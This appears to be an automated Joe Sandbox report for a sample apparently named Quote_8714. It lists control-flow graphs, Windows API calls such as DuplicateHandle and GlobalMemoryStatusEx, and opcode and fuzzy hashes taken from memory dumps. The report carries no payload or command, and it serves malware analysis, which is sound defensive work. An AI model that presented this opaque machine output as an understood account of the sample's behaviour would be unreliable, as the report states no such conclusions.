632d67c 29584->29585 29587 632d659 29584->29587 29585->29560 29586 632d880 GetModuleHandleW 29588 632d8ad 29586->29588 29587->29585 29587->29586 29588->29560

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 967 cad4d8-cad577 GetCurrentProcess 972 cad579-cad57f 967->972 973 cad580-cad5b4 GetCurrentThread 967->973 972->973 974 cad5bd-cad5f1 GetCurrentProcess 973->974 975 cad5b6-cad5bc 973->975 977 cad5fa-cad612 974->977 978 cad5f3-cad5f9 974->978 975->974 989 cad615 call cad78a 977->989 990 cad615 call cad802 977->990 978->977 980 cad61b-cad64a GetCurrentThreadId 982 cad64c-cad652 980->982 983 cad653-cad6b5 980->983 982->983 989->980 990->980
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00CAD566
                                                                                                      • GetCurrentThread.KERNEL32 ref: 00CAD5A3
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00CAD5E0
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00CAD639
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: 41911dc5dad7a0eeb587c658cb1dbfe6f2635dded46980d6ac451d2cdf0ba619
                                                                                                      • Instruction ID: 7e913cd4372bad10b5f0f1b3a2e133558644f48db6aaef69cad586b749df80fc
                                                                                                      • Opcode Fuzzy Hash: 41911dc5dad7a0eeb587c658cb1dbfe6f2635dded46980d6ac451d2cdf0ba619
                                                                                                      • Instruction Fuzzy Hash: 205149B0D0020A8FDB14DFA9D548BDEBBF5BB49308F208459E01AA7360DB749985CF65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 991 cad4e8-cad577 GetCurrentProcess 995 cad579-cad57f 991->995 996 cad580-cad5b4 GetCurrentThread 991->996 995->996 997 cad5bd-cad5f1 GetCurrentProcess 996->997 998 cad5b6-cad5bc 996->998 1000 cad5fa-cad612 997->1000 1001 cad5f3-cad5f9 997->1001 998->997 1012 cad615 call cad78a 1000->1012 1013 cad615 call cad802 1000->1013 1001->1000 1003 cad61b-cad64a GetCurrentThreadId 1005 cad64c-cad652 1003->1005 1006 cad653-cad6b5 1003->1006 1005->1006 1012->1003 1013->1003
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00CAD566
                                                                                                      • GetCurrentThread.KERNEL32 ref: 00CAD5A3
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00CAD5E0
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00CAD639
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$ProcessThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2063062207-0
                                                                                                      • Opcode ID: 5ebd7027916f962b0463528bbe37b3b8e1952be75fc1689b2480381f8b285104
                                                                                                      • Instruction ID: 36d30dd5d8553706a295c3c3f06b04973d1207228eb902dff48c1a9a93e071d7
                                                                                                      • Opcode Fuzzy Hash: 5ebd7027916f962b0463528bbe37b3b8e1952be75fc1689b2480381f8b285104
                                                                                                      • Instruction Fuzzy Hash: C85139B0D0020A8FDB14DFA9D548BDEBBF1BF49318F208459E41AA7360DB749985CF65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2780 632d638-632d657 2781 632d683-632d687 2780->2781 2782 632d659-632d666 call 632bfe4 2780->2782 2783 632d69b-632d6dc 2781->2783 2784 632d689-632d693 2781->2784 2789 632d668 2782->2789 2790 632d67c 2782->2790 2791 632d6e9-632d6f7 2783->2791 2792 632d6de-632d6e6 2783->2792 2784->2783 2836 632d66e call 632d8d2 2789->2836 2837 632d66e call 632d8e0 2789->2837 2838 632d66e call 632d936 2789->2838 2790->2781 2793 632d71b-632d71d 2791->2793 2794 632d6f9-632d6fe 2791->2794 2792->2791 2796 632d720-632d727 2793->2796 2797 632d700-632d707 call 632bff0 2794->2797 2798 632d709 2794->2798 2795 632d674-632d676 2795->2790 2799 632d7b8-632d7d6 2795->2799 2800 632d734-632d73b 2796->2800 2801 632d729-632d731 2796->2801 2803 632d70b-632d719 2797->2803 2798->2803 2814 632d7df-632d834 2799->2814 2804 632d748-632d751 2800->2804 2805 632d73d-632d745 2800->2805 2801->2800 2803->2796 2810 632d753-632d75b 2804->2810 2811 632d75e-632d763 2804->2811 2805->2804 2810->2811 2812 632d781-632d785 2811->2812 2813 632d765-632d76c 2811->2813 2816 632d78b-632d78e 2812->2816 2813->2812 2815 632d76e-632d77e call 6329fa8 call 632c000 2813->2815 2829 632d836-632d878 2814->2829 2815->2812 2819 632d790-632d7ae 2816->2819 2820 632d7b1-632d7b7 2816->2820 2819->2820 2831 632d880-632d8ab GetModuleHandleW 2829->2831 2832 632d87a-632d87d 2829->2832 2833 632d8b4-632d8c8 2831->2833 2834 632d8ad-632d8b3 2831->2834 2832->2831 2834->2833 2836->2795 2837->2795 2838->2795
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0632D89E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2946945838.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_6320000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 1e98553e4ea8ef60a93db9690c811af971011fde53b66c5c581a341e9059102e
                                                                                                      • Instruction ID: b27594242ecfa5a6d44e589de3ddffe8b38109319e6ae4e7532e6eaa71ee2311
                                                                                                      • Opcode Fuzzy Hash: 1e98553e4ea8ef60a93db9690c811af971011fde53b66c5c581a341e9059102e
                                                                                                      • Instruction Fuzzy Hash: E6815370A00B568FD7A4DF29D49079ABBF1FF88304F108A2ED48AD7A50D735E949CB90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2839 cad870-cad889 2840 cad88b-cad88f 2839->2840 2841 cad84e-cad864 2839->2841 2842 cad890-cad8a6 2840->2842 2843 cad8a8 2842->2843 2844 cad8d0-cad8e9 2842->2844 2845 cad8aa 2843->2845 2846 cad91b-cad994 DuplicateHandle 2843->2846 2847 cad8eb-cad918 2844->2847 2848 cad8ae-cad8b0 2844->2848 2851 cad99d-cad9ba 2846->2851 2852 cad996-cad99c 2846->2852 2847->2846 2848->2842 2849 cad8b2-cad8ca 2848->2849 2852->2851
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: f31dfe115e53c8af014ef230789a3601305b9dfea1fe4d2d50947343aed95815
                                                                                                      • Instruction ID: ea5087b439e251673cb983cd8a65759a44dae5dcf65767d53ccc303013b546c7
                                                                                                      • Opcode Fuzzy Hash: f31dfe115e53c8af014ef230789a3601305b9dfea1fe4d2d50947343aed95815
                                                                                                      • Instruction Fuzzy Hash: FD41C4759053449FCB01CFA5D8406DABFF4EF46314F19849BE085EB692C3399946CBA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2856 6313d98-6313da3 2857 6313da5-6313dcc call 63125d8 2856->2857 2858 6313dcd-6313dec call 63125e4 2856->2858 2864 6313df2-6313e51 2858->2864 2865 6313dee-6313df1 2858->2865 2872 6313e53-6313e56 2864->2872 2873 6313e57-6313ee4 GlobalMemoryStatusEx 2864->2873 2877 6313ee6-6313eec 2873->2877 2878 6313eed-6313f15 2873->2878 2877->2878
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d777fafe47c5a595f4c8056b149f48ce359019668ebaaab06f4b4d2c6e0fc4fe
                                                                                                      • Instruction ID: a14f40204df4f955ddc260191cb5db2eed6167fc8074d0483bde7091ef6b92e3
                                                                                                      • Opcode Fuzzy Hash: d777fafe47c5a595f4c8056b149f48ce359019668ebaaab06f4b4d2c6e0fc4fe
                                                                                                      • Instruction Fuzzy Hash: 3C413132E143998FCB04DF79D8542AEBBF5EF89310F14856AD444AB291DB34A984CBE1
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: edde6b71ed9553edb211ed2dfc82888f590e634033516f14d3046bfbc7719161
                                                                                                      • Instruction ID: cbd59dbf05b18818e31b90a1458c4d6922af7fe3e1ae38265b0ff5726c7b5781
                                                                                                      • Opcode Fuzzy Hash: edde6b71ed9553edb211ed2dfc82888f590e634033516f14d3046bfbc7719161
                                                                                                      • Instruction Fuzzy Hash: 4321E4B5900209DFDB10CFAAD584ADEFFF4EB48310F14841AE959A3310C374A940CFA4
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2941084634.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_ca0000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 236204a0d2d1eb5e3d75ba4514d422ed4962b2def2cfb9870e8a9d59b5c29de3
                                                                                                      • Instruction ID: 68c629ad65bd5413bf81896dcb773ce8b2c24cf586209f342c5f28c59105b9b1
                                                                                                      • Opcode Fuzzy Hash: 236204a0d2d1eb5e3d75ba4514d422ed4962b2def2cfb9870e8a9d59b5c29de3
                                                                                                      • Instruction Fuzzy Hash: C321E2B5900209EFDB10CFA9D584ADEFBF4FB48314F24841AE959A7250C374A944CFA4
                                                                                                      APIs
                                                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06313DEA), ref: 06313ED7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1890195054-0
                                                                                                      • Opcode ID: 028ea9097c893ef06f636746b0aa0c643d10030e7d060e152d4d7ca7298aa38e
                                                                                                      • Instruction ID: 468dc2833913ea53481a8ad6c878f9a10159227d20982607158961cbde43d76f
                                                                                                      • Opcode Fuzzy Hash: 028ea9097c893ef06f636746b0aa0c643d10030e7d060e152d4d7ca7298aa38e
                                                                                                      • Instruction Fuzzy Hash: C121F4B2C00659DFDB10DF9AC944BAEFBF4AB48320F14856AD858A7241D378A944CFA5
                                                                                                      APIs
                                                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06313DEA), ref: 06313ED7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2946920340.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_6310000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: GlobalMemoryStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 1890195054-0
                                                                                                      • Opcode ID: 28c1ada88a2b4194fe92eda48ecfa7a76f1a061dc8f912e6a4094ccfd3f1ccbb
                                                                                                      • Instruction ID: baaa29c29259d876cc8c563beec57197f587cf40d27c5346a5bbb5a31b831bfa
                                                                                                      • Opcode Fuzzy Hash: 28c1ada88a2b4194fe92eda48ecfa7a76f1a061dc8f912e6a4094ccfd3f1ccbb
                                                                                                      • Instruction Fuzzy Hash: 941103B2C006599FDB14DF9AC444BEEFBF4AB48320F10816AE818A7251D378A944CFE5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0632D89E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2946945838.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_6320000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: d9302c295f2995823a033ffcc84730b56d6421335a1ff3d34a55eec9eb4a02ca
                                                                                                      • Instruction ID: 93858aca4782f5b2bcccbded2c133f5666ca002073d96428608c823ebb98508f
                                                                                                      • Opcode Fuzzy Hash: d9302c295f2995823a033ffcc84730b56d6421335a1ff3d34a55eec9eb4a02ca
                                                                                                      • Instruction Fuzzy Hash: 211110B5C002598FCB10DF9AC844ADEFBF4AF88324F10842AD828A7210C375A545CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2940850765.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_c5d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
                                                                                                      • Instruction ID: a051aae96bde311411131f7d5ec1abe8c6dc53faa1d43ca87d8bc43a80e8e6eb
                                                                                                      • Opcode Fuzzy Hash: 25b0d7488cd6e25d31ea518c1b5a3f26de43e609dacb837fce0380589facf572
                                                                                                      • Instruction Fuzzy Hash: A221F279604300DFDB24DF14D9C4B26BBA5EBC4315F20C569EC0A4B296C33AD88BCA66
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2940850765.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_c5d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
                                                                                                      • Instruction ID: d581f1ba92d002a1d22bcde0165bfbd5f7aafa8e6d48bf1f2b1748010fafff59
                                                                                                      • Opcode Fuzzy Hash: 69df75d156841aad38b4140d112eec7c058b1eaea1251345d5177e783103d13b
                                                                                                      • Instruction Fuzzy Hash: 70218E755093808FDB12CF24D994715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2940779426.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_c4d000_Quote_8714.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a110806d3d8fd17b65a6739ab4f2dfda247d1699a46615849abeea34682f0cd2
                                                                                                      • Instruction ID: 2ebafdd1639a725f08d316c8ab0af30e3d1d96ad5377f7ad1acbc94a50cbaceb
                                                                                                      • Opcode Fuzzy Hash: a110806d3d8fd17b65a6739ab4f2dfda247d1699a46615849abeea34682f0cd2
                                                                                                      • Instruction Fuzzy Hash: AEF062714093449EE7109A16D8C4BA2FFA8EF51725F18C85AFD1D4B286C3799844CAB1